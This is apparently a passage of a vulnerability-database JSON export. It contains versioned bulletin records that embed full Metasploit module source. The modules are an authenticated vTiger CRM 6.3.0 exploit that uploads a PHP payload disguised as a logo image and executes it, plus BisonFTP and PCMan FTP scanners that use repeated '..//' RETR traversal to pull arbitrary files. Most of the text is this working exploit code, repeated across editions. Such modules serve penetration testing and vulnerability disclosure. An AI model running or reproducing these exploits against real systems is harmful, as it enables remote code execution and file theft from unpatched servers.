This module was tested against vTiger CRM v6.3.0.\n", "published": "2018-07-17T23:28:33", "modified": "2018-07-30T17:15:59", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6000", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1713"], "cvelist": ["CVE-2015-6000", "CVE-2016-1713"], "lastseen": "2019-09-09T16:43:07", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2019-09-09T16:43:07"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-1713"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32624", "SECURITYVULNS:VULN:14750"]}, {"type": "zdt", "idList": ["1337DAY-ID-30805", "1337DAY-ID-24304", "1337DAY-ID-30084"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VTIGER_LOGO_UPLOAD_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148753", "PACKETSTORM:133755"]}, {"type": "dsquare", "idList": ["E-622"]}, {"type": "exploitdb", "idList": ["EDB-ID:38345", "EDB-ID:44379"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808752"]}], "modified": "2019-09-09T16:43:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vtiger_logo_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Vtiger CRM - Authenticated Logo Upload RCE',\n 'Description' => %q{\n Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo.\n Instead of uploading an image, an attacker may choose to upload a file containing PHP code 
and\n run this code by accessing the resulting PHP file.\n\n This module was tested against vTiger CRM v6.3.0.\n },\n 'Author' =>\n [\n 'Benjamin Daniel Mussler', # Discoverys\n 'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module\n 'SecureLayer7.net' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-6000'],\n ['CVE','2016-1713'],\n ['EDB', '38345']\n ],\n 'DefaultOptions' =>\n {\n 'Encoder' => 'php/base64',\n 'RPORT' => 8888\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['vTiger CRM v6.3.0', {}],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 28 2015'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Base vTiger CRM directory path', '/']),\n OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [ true, 'Password to authenticate with', ''])\n ])\n\n register_advanced_options(\n [\n OptBool.new('PHPSHORTTAG', [true, 'Use short open php tags around payload', true])\n ])\n end\n\n def check\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') })\n\n unless res\n vprint_error(\"Unable to access the index.php file\")\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n vprint_error(\"Error accessing the index.php file\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\\/small>/i\n vprint_status(\"vTiger CRM version: #{$1}\")\n if $1 == '6.3.0'\n return CheckCode::Vulnerable\n else\n return CheckCode::Detected\n end\n end\n\n CheckCode::Safe\n end\n\n # Login Function.\n def login\n # Dummy Request for grabbing CSRF token and PHPSESSION ID\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could 
not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for login: #{csrf}\")\n\n # Get Login now.\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'module' => 'Users',\n 'action' => 'Login',\n },\n 'vars_post' => {\n '__vtrftk' => csrf,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n },\n })\n\n unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\")\n end\n\n cookie = nil\n if res.code == 302 && res.headers['Location'].include?(\"index.php?module=Users&parent=Settings&view=SystemSetup\")\n vprint_good(\"Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n cookie = res.get_cookies.split[-1]\n end\n\n unless cookie\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\n end\n\n cookie\n end\n\n def exploit\n cookie = login\n unless cookie\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed\")\n end\n\n pay_name = rand_text_alpha(rand(5..10)) + \".php\"\n\n # Retrieve CSRF token\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for Form Upload: #{csrf}\")\n\n stager = datastore['PHPSHORTTAG'] ? '<? 
' : '<?php '\n stager << payload.encoded\n stager << ' ?>'\n\n # Setting Company Form data\n post_data = Rex::MIME::Message.new\n post_data.add_part(csrf, nil, nil, \"form-data; name=\\\"__vtrftk\\\"\") # CSRF token\n post_data.add_part('Vtiger', nil, nil, \"form-data; name=\\\"module\\\"\")\n post_data.add_part('Settings', nil, nil, \"form-data; name=\\\"parent\\\"\")\n post_data.add_part('CompanyDetailsSave', nil, nil, \"form-data; name=\\\"action\\\"\")\n post_data.add_part(stager, \"image/jpeg\", nil, \"form-data; name=\\\"logo\\\"; filename=\\\"#{pay_name}\\\"\")\n post_data.add_part('vtiger', nil, nil, \"form-data; name=\\\"organizationname\\\"\")\n data = post_data.to_s\n\n print_status(\"Uploading payload: #{pay_name}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie,\n 'connection' => 'close',\n 'headers' => {\n 'Referer' => \"http://#{peer}/index.php?parent=Settings&module=Vtiger&view=CompanyDetails\",\n 'Upgrade-Insecure-Requests' => '1',\n },\n 'data' => data,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n })\n\n unless res && res.code == 302\n fail_with(Failure::None, \"#{peer} - File wasn't uploaded, aborting!\")\n end\n\n # Cleanup file\n register_files_for_cleanup(pay_name)\n\n vprint_status(\"Executing Payload: #{peer}/test/logo/#{pay_name}\" )\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"test\", \"logo\", pay_name)\n })\n\n if res && res.code != 200\n fail_with(Failure::UnexpectedReply, \"#{peer} - Payload not executed\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-09T16:43:07", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 90}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": 
"6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-09T18:46:46", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-09T18:46:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-09-09T18:46:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-09T18:46:46", "differentElements": ["sourceData"], "edition": 91}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-10T00:41:41", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-09-10T00:41:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-09-10T00:41:41"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-10T00:41:41", "differentElements": ["sourceData"], "edition": 92}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-09-10T02:38:46", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-09-10T02:38:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-09-10T02:38:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-10T02:38:46", "differentElements": ["modified", "sourceData"], "edition": 93}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-05T19:38:37", "history": [], "viewCount": 20, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-05T19:38:37"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-05T19:38:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T19:38:37", "differentElements": ["cvelist", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 94}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "09f75b48458c7b5570146a0d19e17859", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:08:23", "modified": "2019-10-05T17:50:30", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601"], "cvelist": ["CVE-2015-7601"], "lastseen": "2019-10-09T01:40:19", "history": [], "viewCount": 20, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-09T01:40:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7601"]}, {"type": "exploitdb", "idList": ["EDB-ID:38340"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/FTP/PCMAN_FTP_TRAVERSAL"]}], "modified": "2019-10-09T01:40:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts', # initial discovery\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38340'],\n [ 
'CVE', '2015-7601']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /220 PCMan's FTP Server 2\\.0/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! 
(res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"pcman.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T01:40:19", "differentElements": ["cvelist", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 95}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-09T03:33:03", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-09T03:33:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-10-09T03:33:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
